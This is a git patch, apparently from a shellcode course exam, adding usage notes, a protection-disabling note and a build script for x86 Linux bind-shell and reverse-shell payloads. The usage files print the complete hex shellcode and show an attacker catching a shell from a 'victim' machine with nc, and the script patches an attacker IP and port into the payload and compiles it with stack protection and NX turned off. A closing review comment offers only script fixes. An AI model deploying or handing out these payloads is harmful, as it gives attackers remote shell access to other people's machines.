From 95690185f2cc237666ed19ef4b3430f7c352fd4d Mon Sep 17 00:00:00 2001
From: arno01
Date: Wed, 13 Mar 2013 00:06:45 +0100
Subject: [PATCH] minor updates
---
exam1/USAGE | 34 ++++++++++
exam2/NOTES | 11 +++
exam2/USAGE | 35 ++++++++++
exam2/compile_all.sh | 158 +++++++++++++++++++++++++++++++++++++++++++
4 files changed, 238 insertions(+)
create mode 100644 exam1/USAGE
create mode 100644 exam2/NOTES
create mode 100644 exam2/USAGE
create mode 100644 exam2/compile_all.sh
diff --git a/exam1/USAGE b/exam1/USAGE
new file mode 100644
index 0000000..b788fe2
--- /dev/null
+++ b/exam1/USAGE
@@ -0,0 +1,34 @@
+USAGE
+
+
+1. Compile the shellcode
+
+$ ./compile_all.sh shell_bind_tcp 50123
+ [I] Using custom port: 50123
+ [+] Assembling shell_bind_tcp.nasm with NASM ...
+ [+] Linking shell_bind_tcp.o ...
+ [+] Generating shellcode with objdump ...
+ [+] Checking shellcode for NULLs ...
+ [+] Shellcode size is 141 bytes
+"\x31\xc0\xb0\x66\x31\xdb\xb3\x01\x31\xc9\x51\x6a\x06\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xeb\x6d\x5f\x31\xc0\xb0\x66\x31\xdb\xb3\x02\x31\xd2\x52\x66\xff\x37\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x31\xc0\xb0\x66\x31\xdb\xb3\x04\x6a\x01\x56\x89\xe1\xcd\x80\x31\xc0\xb0\x66\x31\xdb\xb3\x05\x31\xd2\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc0\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80\xb0\x3f\xb1\x02\xcd\x80\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80\xe8\x8e\xff\xff\xff\xc3\xcb"
+ [+] Generating shellcode.c file with the shell_bind_tcp shellcode ...
+ [+] Compiling shellcode.c with GCC ...
+ [+] All done! You can run the shellcode now:
+$ ./shellcode
+
+
+1. Run the shellcode on the victim machine
+
+victim $ ./shellcode
+Shellcode Length: 141
+
+victim # netstat --inet -apn |grep shellcode
+tcp 0 0 0.0.0.0:50123 0.0.0.0:* LISTEN 982/./shellcode
+
+
+2. Attacker can now connect and get the shell
+
+attacker $ nc localhost 50123
+id
+uid=500(arno) gid=500(arno) groups=500(arno),18(dialout),498(desktop_admin_r),501(vboxusers) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
+
diff --git a/exam2/NOTES b/exam2/NOTES
new file mode 100644
index 0000000..088dd00
--- /dev/null
+++ b/exam2/NOTES
@@ -0,0 +1,11 @@
+NOTES
+
+ no-stack-protector: disables GCC Stack-Smashing Protector (SSP), aka ProPolice
+
+ execstack: disables Executable space protection (NX).
+ Or Data Execution Prevention (DEP) on Windows,
+ or Write XOR Execute (W^X) on BSD.
+ CPU’s NX bit ("Never eXecute").
+
+ To disalbe Address Space Layout Randomization (ASLR) when running binary
+ setarch `arch` -R ./program
diff --git a/exam2/USAGE b/exam2/USAGE
new file mode 100644
index 0000000..55ea17b
--- /dev/null
+++ b/exam2/USAGE
@@ -0,0 +1,35 @@
+USAGE
+
+1. attacker has 192.168.1.149 IP and runs nc to listen on 55005 port
+
+attacker $ nc -vl 55005
+[do not close it]
+
+
+2. Running shellcode a victim server
+exam2$ ./compile_all.sh shell_reverse_tcp 192.168.1.149 55005
+ [I] Using custom port: 55005
+ [+] Assembling shell_reverse_tcp.nasm with NASM ...
+ [+] Linking shell_reverse_tcp.o ...
+ [+] Generating shellcode with objdump ...
+ [+] Checking shellcode for NULLs ...
+ [+] Shellcode size is 117 bytes
+"\x31\xc0\xb0\x66\x31\xdb\xb3\x01\x31\xc9\x51\x6a\x06\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xeb\x51\x5f\x31\xc0\xb0\x66\x31\xdb\xb3\x03\x31\xd2\xff\x37\x66\xff\x77\x04\x4b\x66\x53\x43\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x89\xd8\x31\xc0\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80\xb0\x3f\xb1\x02\xcd\x80\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80\xe8\xaa\xff\xff\xff\xc0\xa8\x01\x95\xd6\xdd"
+ [+] Generating shellcode.c file with the shell_reverse_tcp shellcode ...
+ [+] Compiling shellcode.c with GCC ...
+ [+] All done! You can run the shellcode now:
+$ ./shellcode
+
+exam2$ ./shellcode
+Shellcode Length: 117
+
+
+3. Checking now your nc
+attacker $ nc -vl 55005
+Connection from 192.168.1.149 port 55005 [tcp/*] accepted
+id
+uid=500(arno) gid=500(arno) groups=500(arno),18(dialout),498(desktop_admin_r),501(vboxusers) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
+
+
+Voila ! We've got a shell to a victim server.
+
diff --git a/exam2/compile_all.sh b/exam2/compile_all.sh
new file mode 100644
index 0000000..d811f43
--- /dev/null
+++ b/exam2/compile_all.sh
@@ -0,0 +1,158 @@
+#!/usr/bin/env sh
+#
+# Creates a shell_reverse_tcp shellcode
+#
+# Example
+# ./compile_all.sh shell_reverse_tcp 192.168.1.1 12357
+#
+# If no IP & Port specified, the default ones will be used 192.168.1.1 12357
+#
+# IP and Port are stored in last 6 bytes in HEX
+#
+
+ARG1=$1 # Specify program
+ARG2=$2 # Specify IP
+ARG3=$3 # Specify port
+
+#
+# Check script usage and file existence
+#
+if [ -z "$ARG1" ]; then
+ echo " [I] Please specify program you would like to assemble!"
+ echo " [I] Usage example: ./compile_all.sh shell_reverse_tcp 192.168.1.1 12357"
+ exit 1;
+elif [ -e "$ARG1" ]; then
+ if [[ $ARG1 == *nasm* ]]; then
+ ARG1=$(echo -ne $ARG1 |sed 's/.....$//g');
+ echo $ARG1
+ fi
+elif [ ! -e "$ARG1".nasm ]; then
+ ARG1_GUESS=$(echo $ARG1 |sed 's/.nasm//g')
+ if [ -e "$ARG1_GUESS" ]; then
+ ARG1=$ARG1_GUESS
+ else
+ echo " [E] File "$ARG1" does not exist!"
+ exit 1;
+ fi
+fi
+
+
+#
+# Validate nasm source file
+#
+if ! $(grep -qi ^global $ARG1.nasm 2>/dev/null); then
+ echo " [E] The file "$ARG1.nasm" does not appear to be a correct NASM source!"
+ exit 1;
+fi
+
+
+#
+# Validate and Convert IP to HEX
+#
+function valid_ip()
+{
+ local ip=$1
+ local stat=1
+
+ if [[ $ip =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$ ]]; then
+ OIFS=$IFS
+ IFS='.'
+ ip=($ip)
+ IFS=$OIFS
+ [[ ${ip[0]} -le 255 && ${ip[1]} -le 255 && \
+ ${ip[2]} -le 255 && ${ip[3]} -le 255 ]]
+ stat=$?
+ fi
+ return $stat
+}
+
+if [ -z "$ARG2" ]; then
+ echo " [E] Please specify IP"
+ exit 1;
+else
+ if valid_ip $ARG2; then
+ IPHEX=$(printf '%.2x' ${ARG2//./ } | sed 's/../\\x&/g')
+ else
+ echo " [E] IP is not valid!"
+ exit 1;
+ fi
+fi
+
+
+#
+# Port range check
+#
+if [ -z "$ARG3" ]; then
+ echo " [I] Default port will be used."
+ ARG3=12357;
+elif ! [[ $ARG3 -ge 1024 && $ARG3 -le 65535 ]]; then
+ echo " [E] The port must be in range 1024..65535 !"
+ exit 1;
+else
+ echo " [I] Using custom port: "$ARG3
+fi
+
+
+#
+# Assemble and link
+#
+echo " [+] Assembling "$ARG1".nasm with NASM ..."
+nasm -f elf32 -o $ARG1.o $ARG1.nasm && \
+echo " [+] Linking "$ARG1".o ..." && \
+ld -m elf_i386 -o $ARG1 $ARG1.o && \
+echo -e " [+] Generating shellcode with objdump ..." && \
+SHELLCODE=$(objdump -d ./$ARG1 |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/' |sed 's/$/"/g')
+
+
+#
+# Set the custom port (if any was specified) for the shellcode
+#
+if [ -z "$ARG3" ]; then
+ FULL_SHELLCODE=$(echo $SHELLCODE)
+else
+ PORT_HEX=$(printf '%.4x' $ARG3 | sed 's/../\\x&/g')
+ FULL_SHELLCODE=$(echo -n $SHELLCODE | sed 's/.........................$//' ; echo ${IPHEX}${PORT_HEX}"\"")
+fi
+
+
+#
+# Check shellcode for NULLs
+#
+echo " [+] Checking shellcode for NULLs ..."
+if [[ $FULL_SHELLCODE == *00* ]]; then
+ echo " [E] Your shellcode contains 00 (NULL) ! Most likely you need to change your IP or port."
+ exit 1
+fi
+
+echo -ne " [+] Shellcode size is "$(echo -ne $FULL_SHELLCODE|sed 's/\"//g'|wc -c)" bytes\n"
+echo $FULL_SHELLCODE
+
+
+#
+# Generate shellcode.c
+#
+echo " [+] Generating shellcode.c file with the "$ARG1" shellcode ..."
+cat > shellcode.c << EOF
+#include
+#include
+
+unsigned char code[] = \
+$FULL_SHELLCODE;
+
+main()
+{
+ printf("Shellcode Length: %d\n", strlen(code));
+ int (*ret)() = (int(*)())code;
+ ret();
+}
+EOF
+
+
+#
+# Compile C code with GCC
+#
+echo " [+] Compiling shellcode.c with GCC ..."
+gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode
+
+echo -e " [+] All done! You can run the shellcode now: \n$ ./shellcode"
+
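Review bot: The script is declared `#!/usr/bin/env sh` but relies on bash-only syntax — `function valid_ip()`, `[[ ... ]]` with `=~` and `-ge`, the `ip=($ip)` array and the `${ARG2//./ }` expansion — so where `sh` is dash it would not get past the `function valid_ip()` line; the first line should read `#!/usr/bin/env bash`. In the port check, `[[ $ARG3 -ge 1024 && $ARG3 -le 65535 ]]` evaluates both operands as arithmetic expressions, so a non-numeric third argument is interpreted rather than rejected; a digits-only guard first, `elif ! [[ $ARG3 =~ ^[0-9]+$ && $ARG3 -ge 1024 && $ARG3 -le 65535 ]]; then`, is the safer shape. The NASM-source test `if ! $(grep -qi ^global $ARG1.nasm 2>/dev/null); then` only works because bash reports the substitution's exit status when it expands to no command; `if ! grep -qi '^global' "$ARG1.nasm" 2>/dev/null; then` states the intent and also quotes the path. The later `if [ -z "$ARG3" ]` branch that would leave the IP bytes unpatched is unreachable, since ARG3 is defaulted to 12357 in the port-range block above it; either drop it or make the default path also apply `${IPHEX}`. Unquoted uses of `$ARG1`, `$ARG2` and `$SHELLCODE` elsewhere will break on paths containing spaces or glob characters.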